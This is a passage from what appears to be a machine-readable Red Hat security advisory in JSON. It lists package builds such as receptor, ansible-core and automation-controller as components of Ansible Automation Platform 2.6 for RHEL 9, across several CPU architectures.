"product_reference": "receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le"
},
"product_reference": "receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-debuginfo-0:1.6.4-1.el9ap.s390x as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.s390x"
},
"product_reference": "receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-debuginfo-0:1.6.4-1.el9ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.x86_64"
},
"product_reference": "receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-debugsource-0:1.6.4-1.el9ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.aarch64"
},
"product_reference": "receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-debugsource-0:1.6.4-1.el9ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.ppc64le"
},
"product_reference": "receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-debugsource-0:1.6.4-1.el9ap.s390x as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.s390x"
},
"product_reference": "receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-debugsource-0:1.6.4-1.el9ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.x86_64"
},
"product_reference": "receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptorctl-0:1.6.4-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.4-1.el9ap.noarch"
},
"product_reference": "receptorctl-0:1.6.4-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-core-1:2.16.17-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6-Inside-1.4:ansible-core-1:2.16.17-1.el9ap.noarch"
},
"product_reference": "ansible-core-1:2.16.17-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6-Inside-1.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-core-1:2.16.17-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6-Inside-1.4:ansible-core-1:2.16.17-1.el9ap.src"
},
"product_reference": "ansible-core-1:2.16.17-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6-Inside-1.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-test-1:2.16.17-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6-Inside-1.4:ansible-test-1:2.16.17-1.el9ap.noarch"
},
"product_reference": "ansible-test-1:2.16.17-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6-Inside-1.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-0:1.6.4-1.el9ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.aarch64"
},
"product_reference": "receptor-0:1.6.4-1.el9ap.aarch64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6-Inside-1.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-0:1.6.4-1.el9ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.ppc64le"
},
"product_reference": "receptor-0:1.6.4-1.el9ap.ppc64le",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6-Inside-1.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-0:1.6.4-1.el9ap.s390x as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.s390x"
},
"product_reference": "receptor-0:1.6.4-1.el9ap.s390x",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6-Inside-1.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-0:1.6.4-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.src"
},
"product_reference": "receptor-0:1.6.4-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6-Inside-1.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-0:1.6.4-1.el9ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.x86_64"
},
"product_reference": "receptor-0:1.6.4-1.el9ap.x86_64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6-Inside-1.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-debuginfo-0:1.6.4-1.el9ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.aarch64"
},
"product_reference": "receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6-Inside-1.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le"
},
"product_reference": "receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6-Inside-1.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-debuginfo-0:1.6.4-1.el9ap.s390x as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.s390x"
},
"product_reference": "receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6-Inside-1.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-debuginfo-0:1.6.4-1.el9ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.x86_64"
},
"product_reference": "receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6-Inside-1.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-debugsource-0:1.6.4-1.el9ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.aarch64"
},
"product_reference": "receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6-Inside-1.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-debugsource-0:1.6.4-1.el9ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.ppc64le"
},
"product_reference": "receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6-Inside-1.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-debugsource-0:1.6.4-1.el9ap.s390x as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.s390x"
},
"product_reference": "receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6-Inside-1.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-debugsource-0:1.6.4-1.el9ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.x86_64"
},
"product_reference": "receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6-Inside-1.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptorctl-0:1.6.4-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.4-1.el9ap.noarch"
},
"product_reference": "receptorctl-0:1.6.4-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6-Inside-1.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "aap-metrics-utility-0:0.6.3-3.el9ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.aarch64"
},
"product_reference": "aap-metrics-utility-0:0.6.3-3.el9ap.aarch64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "aap-metrics-utility-0:0.6.3-3.el9ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.ppc64le"
},
"product_reference": "aap-metrics-utility-0:0.6.3-3.el9ap.ppc64le",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "aap-metrics-utility-0:0.6.3-3.el9ap.s390x as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.s390x"
},
"product_reference": "aap-metrics-utility-0:0.6.3-3.el9ap.s390x",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "aap-metrics-utility-0:0.6.3-3.el9ap.src as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.src"
},
"product_reference": "aap-metrics-utility-0:0.6.3-3.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "aap-metrics-utility-0:0.6.3-3.el9ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.x86_64"
},
"product_reference": "aap-metrics-utility-0:0.6.3-3.el9ap.x86_64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-automation-platform-installer-0:2.6-6.1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:ansible-automation-platform-installer-0:2.6-6.1.el9ap.noarch"
},
"product_reference": "ansible-automation-platform-installer-0:2.6-6.1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-automation-platform-installer-0:2.6-6.1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:ansible-automation-platform-installer-0:2.6-6.1.el9ap.src"
},
"product_reference": "ansible-automation-platform-installer-0:2.6-6.1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-core-1:2.16.17-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:ansible-core-1:2.16.17-1.el9ap.noarch"
},
"product_reference": "ansible-core-1:2.16.17-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-core-1:2.16.17-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:ansible-core-1:2.16.17-1.el9ap.src"
},
"product_reference": "ansible-core-1:2.16.17-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-rulebook-0:1.2.2-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:ansible-rulebook-0:1.2.2-1.el9ap.noarch"
},
"product_reference": "ansible-rulebook-0:1.2.2-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-rulebook-0:1.2.2-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:ansible-rulebook-0:1.2.2-1.el9ap.src"
},
"product_reference": "ansible-rulebook-0:1.2.2-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-test-1:2.16.17-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:ansible-test-1:2.16.17-1.el9ap.noarch"
},
"product_reference": "ansible-test-1:2.16.17-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.7.10-2.el9ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.aarch64"
},
"product_reference": "automation-controller-0:4.7.10-2.el9ap.aarch64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.7.10-2.el9ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.ppc64le"
},
"product_reference": "automation-controller-0:4.7.10-2.el9ap.ppc64le",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.7.10-2.el9ap.s390x as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.s390x"
},
"product_reference": "automation-controller-0:4.7.10-2.el9ap.s390x",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.7.10-2.el9ap.src as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.src"
},
"product_reference": "automation-controller-0:4.7.10-2.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.7.10-2.el9ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.x86_64"
},
"product_reference": "automation-controller-0:4.7.10-2.el9ap.x86_64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-cli-0:4.7.10-2.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.10-2.el9ap.noarch"
},
"product_reference": "automation-controller-cli-0:4.7.10-2.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-server-0:4.7.10-2.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.10-2.el9ap.noarch"
},
"product_reference": "automation-controller-server-0:4.7.10-2.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-ui-0:4.7.10-2.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.10-2.el9ap.noarch"
},
"product_reference": "automation-controller-ui-0:4.7.10-2.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.7.10-2.el9ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.aarch64"
},
"product_reference": "automation-controller-venv-tower-0:4.7.10-2.el9ap.aarch64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.7.10-2.el9ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.ppc64le"
},
"product_reference": "automation-controller-venv-tower-0:4.7.10-2.el9ap.ppc64le",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.7.10-2.el9ap.s390x as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.s390x"
},
"product_reference": "automation-controller-venv-tower-0:4.7.10-2.el9ap.s390x",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.7.10-2.el9ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.x86_64"
},
"product_reference": "automation-controller-venv-tower-0:4.7.10-2.el9ap.x86_64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-eda-controller-0:1.2.7-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.7-1.el9ap.noarch"
},
"product_reference": "automation-eda-controller-0:1.2.7-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-eda-controller-0:1.2.7-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.7-1.el9ap.src"
},
"product_reference": "automation-eda-controller-0:1.2.7-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-eda-controller-base-0:1.2.7-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.7-1.el9ap.noarch"
},
"product_reference": "automation-eda-controller-base-0:1.2.7-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-eda-controller-base-services-0:1.2.7-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.7-1.el9ap.noarch"
},
"product_reference": "automation-eda-controller-base-services-0:1.2.7-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-eda-controller-event-stream-services-0:1.2.7-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.7-1.el9ap.noarch"
},
"product_reference": "automation-eda-controller-event-stream-services-0:1.2.7-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-eda-controller-worker-services-0:1.2.7-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.7-1.el9ap.noarch"
},
"product_reference": "automation-eda-controller-worker-services-0:1.2.7-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-0:2.6.20260325-2.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260325-2.el9ap.noarch"
},
"product_reference": "automation-gateway-0:2.6.20260325-2.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-0:2.6.20260325-2.el9ap.src as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260325-2.el9ap.src"
},
"product_reference": "automation-gateway-0:2.6.20260325-2.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-config-0:2.6.20260325-2.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260325-2.el9ap.noarch"
},
"product_reference": "automation-gateway-config-0:2.6.20260325-2.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-proxy-0:2.6.14-1.el9.aarch64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.aarch64"
},
"product_reference": "automation-gateway-proxy-0:2.6.14-1.el9.aarch64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-proxy-0:2.6.14-1.el9.ppc64le as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.ppc64le"
},
"product_reference": "automation-gateway-proxy-0:2.6.14-1.el9.ppc64le",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-proxy-0:2.6.14-1.el9.s390x as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.s390x"
},
"product_reference": "automation-gateway-proxy-0:2.6.14-1.el9.s390x",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-proxy-0:2.6.14-1.el9.src as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.src"
},
"product_reference": "automation-gateway-proxy-0:2.6.14-1.el9.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-proxy-0:2.6.14-1.el9.x86_64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.x86_64"
},
"product_reference": "automation-gateway-proxy-0:2.6.14-1.el9.x86_64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-proxy-debugsource-0:2.6.14-1.el9.aarch64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.aarch64"
},
"product_reference": "automation-gateway-proxy-debugsource-0:2.6.14-1.el9.aarch64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-proxy-debugsource-0:2.6.14-1.el9.ppc64le as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.ppc64le"
},
"product_reference": "automation-gateway-proxy-debugsource-0:2.6.14-1.el9.ppc64le",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-proxy-debugsource-0:2.6.14-1.el9.s390x as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.s390x"
},
"product_reference": "automation-gateway-proxy-debugsource-0:2.6.14-1.el9.s390x",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-proxy-debugsource-0:2.6.14-1.el9.x86_64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.x86_64"
},
